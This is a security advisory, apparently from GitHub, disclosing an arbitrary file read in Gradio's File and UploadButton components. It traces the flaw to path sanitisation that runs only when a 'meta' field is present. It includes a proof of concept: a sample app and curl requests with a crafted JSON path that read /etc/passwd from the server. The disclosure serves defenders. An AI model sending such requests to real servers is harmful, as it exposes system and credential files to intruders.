Arbitrary file read with File and UploadButton components

Summary

If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.

Details

Consider the following application where a user can upload a file and preview its content:

import gradio as gr

def greet(value: bytes):
    return str(value)

demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox")

if __name__ == "__main__":
    demo.launch()

If we run this application and make the following request (which attempts to read the /etc/passwd file)

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain","meta":{"_type":"gradio.FileData"}}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

Then this results in the following error on the server

gradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user.

This is expected. However, if we now remove the "meta":{"_type":"gradio.FileData"} from the request:

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

This doesn't cause an error and results in the content of /etc/passwd being shown in the response!

This works because Gradio relies on the processing_utils.async_move_files_to_cache to sanitize all incoming file paths in all inputs. This function performs the following operation

    return await client_utils.async_traverse(
        data, _move_to_cache, client_utils.is_file_obj_with_meta
    )

where client_utils.is_file_obj_with_meta is used as a filter which tells on which inputs to perform the _move_to_cache function (which also performs the allowed/disallowed check on the file path). The problem is that client_utils.is_file_obj_with_meta is not guaranteed to trigger for every input that contains a file path:

def is_file_obj_with_meta(d) -> bool:
    """
    Check if the given value is a valid FileData object dictionary in newer versions of Gradio
    where the file objects include a specific "meta" key, e.g.
    {
        "path": "path/to/file",
        "meta": {"_type: "gradio.FileData"}
    }
    """
    return (
        isinstance(d, dict)
        and "path" in d
        and isinstance(d["path"], str)
        and "meta" in d
        and d["meta"].get("_type", "") == "gradio.FileData"
    )

For example, as in the PoC, the file path won't be checked if the meta key is not present in the request or if _type is not gradio.FileData.

Then, the path remains under control of the attacker and is used to read a file in _process_single_file function in file.py and upload_button.py (and possibly other places)

PoC

As described above, run the following Gradio app

import gradio as gr

def greet(value: bytes):
    return str(value)

demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox")

if __name__ == "__main__":
    demo.launch()

And make the following request

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

Impact

Arbitrary file read in specific Gradio applications that use File or UploadButton components to upload files and echo/preview the content to the user.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Arbitrary file read with File and UploadButton components

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Credits